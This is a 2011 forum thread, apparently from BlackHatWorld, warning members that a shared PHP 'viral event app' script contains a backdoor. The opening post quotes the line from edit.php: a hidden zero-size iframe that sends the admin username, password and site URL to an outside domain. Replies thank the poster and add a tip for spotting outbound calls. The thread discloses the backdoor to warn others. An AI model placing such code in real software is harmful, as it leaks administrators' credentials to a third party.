1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[WARNING] Backdoor script was posted/shared here, members beware!

Discussion in 'The Shit List' started by indianbill007, Apr 5, 2011.

  1. indianbill007

    indianbill007 Jr. VIP Jr. VIP

    Joined:
    Jan 8, 2010
    Messages:
    4,817
    Likes Received:
    4,053
    Occupation:
    Making Money when the world is sleeping
    Location:
    Menlo Park - Next to Zuck
    This is warning to all those who downloaded this script, shared by someone here,

    Infraction Viral Event App

    With file name

    Infraction Viral Event App.zip

    A fellow BHW member passed me a copy today and I had a look in the code and I found the code had a backdoor.

    On line number 155, in edit.php file.

    Code:
    <iframe src="http://facecatch.info/index.php?adminu=<?php echo urlencode($adminu); ?>&adminp=<?php echo urlencode($adminp); ?>&url=<?php echo "http://" . $_SERVER['HTTP_HOST']  . $_SERVER['REQUEST_URI'];?>" width="0" height="0" frameborder="0">
    So whoever owns this domian, has access to all the admin panels of the script on all servers it was installed.

    He is pawning on your hardwork, so before he causes you more damage just delete the script if you have installed it and get it investigated by an expert before using it.

    And learn your lesson that no one will give you free gold free of cost. The event app is a hot gold mine now so dont fall any trap and install anything you get and open backdoors on your servers.

    Take Care Guys,
    IndianBill007

    PS: Apparently this file comes from this forum - http://*******VIP.COM
    as per the note in the files.
     
    • Thanks Thanks x 6
  2. sercon

    sercon Regular Member

    Joined:
    Oct 21, 2010
    Messages:
    277
    Likes Received:
    182
    Location:
    OverTheRainbow
    Thank you for the heads`up !
     
  3. roamer

    roamer Power Member

    Joined:
    Dec 2, 2008
    Messages:
    500
    Likes Received:
    479
    Occupation:
    Gfx designer, vfx and mgfx
    Location:
    plɹoʍ ǝɥʇ punoɹɐ ƃuıɯɐoɹ
    Thanks for the heads up. I never use anything like this unless I check it througly; I downloaded this to test it later locally, so now I'll triple check it's behavior. I hope more people see this warning.
     
  4. Stoner47

    Stoner47 Registered Member

    Joined:
    Feb 15, 2008
    Messages:
    50
    Likes Received:
    19
    That's what you get for free shared shit! I got a hold of this one and showed it to IndianBill and he immediately found the threat. Not worth buying $50 scripts you guys, even free ( its not going to work ).. Stop wasting your time with this shit.. Spend some money and get some quality support and something that works!
     
  5. angelas111

    angelas111 Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 4, 2009
    Messages:
    1,570
    Likes Received:
    1,016
    Location:
    ohio
    thanks indianbill. any tips on how to scan scripts for that kind of stuff?
     
  6. indianbill007

    indianbill007 Jr. VIP Jr. VIP

    Joined:
    Jan 8, 2010
    Messages:
    4,817
    Likes Received:
    4,053
    Occupation:
    Making Money when the world is sleeping
    Location:
    Menlo Park - Next to Zuck
    Hi Angelas,

    yes the best way to scan such scripts is install them on local and see if they are making calls to any back door server/domain.

    I use this handy free tool

    https://addons.mozilla.org/en-US/firefox/addon/httpfox/

    make sure you close all your other browser windows so you dont get confused.

    When you are inspecting, simply launch 1 browser window with the script in question, and open httpfox, if you dont see any calls made outside localhost, the script is clean.

    However if you see it calling anything outside localhost, its backdoored.

    Hope this helps.

    I will post a step by step guide to scan scripts tomorrow may be.
     
    • Thanks Thanks x 2
    Last edited: Apr 5, 2011